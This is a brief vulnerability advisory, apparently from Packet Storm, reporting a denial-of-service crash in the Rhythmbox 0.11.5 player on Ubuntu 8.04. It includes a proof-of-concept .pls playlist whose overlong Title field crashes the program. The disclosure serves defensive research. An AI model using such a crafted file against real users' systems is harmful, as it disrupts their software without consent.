Rhythmbox MP3 player version 0.11.5 suffers from a denial of service vulnerability.
28948fe257a03fcc2ea0f6ac3f91d2e7023078afb6bac611a512bc6c0aafbe17Application: Rhythmbox 0.11.5
OS: Linux - Ubuntu 8.04
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description
Rhythmbox is a renowned player of mp3 files that comes bundled in ubuntu.
What makes this vulnerability so dangerous is that it comes as default in ubuntu
is quite possible that creating malicious file is opened with this player.
------------------------------------------------------
Vulnerability
The vulnerability works when a file of reproduction specially trained is created this causes the program to break.
Analyzing in more detail the failure with a debugger you can see the flaw in the segment but you cannot see precisely which function fails.
0x0844a767 in? ()
------------------------------------------------------
POC/EXPLOIT
For a proof of concept you should create a file with the extension of reproduction (pls) and put the following content.
[playlist]
X-GNOME-Title=
Title= A * 1475
NumberOfEntries=0
------------------------------------------------------
Juan Pablo Lopez Yacubian
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed